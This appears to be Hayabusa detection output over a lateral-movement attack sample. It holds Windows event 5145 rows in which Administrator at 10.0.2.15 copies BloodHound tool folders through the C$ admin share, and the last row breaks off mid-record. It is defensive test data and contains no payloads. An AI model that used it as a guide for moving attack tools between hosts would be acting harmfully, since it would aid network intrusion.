2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 
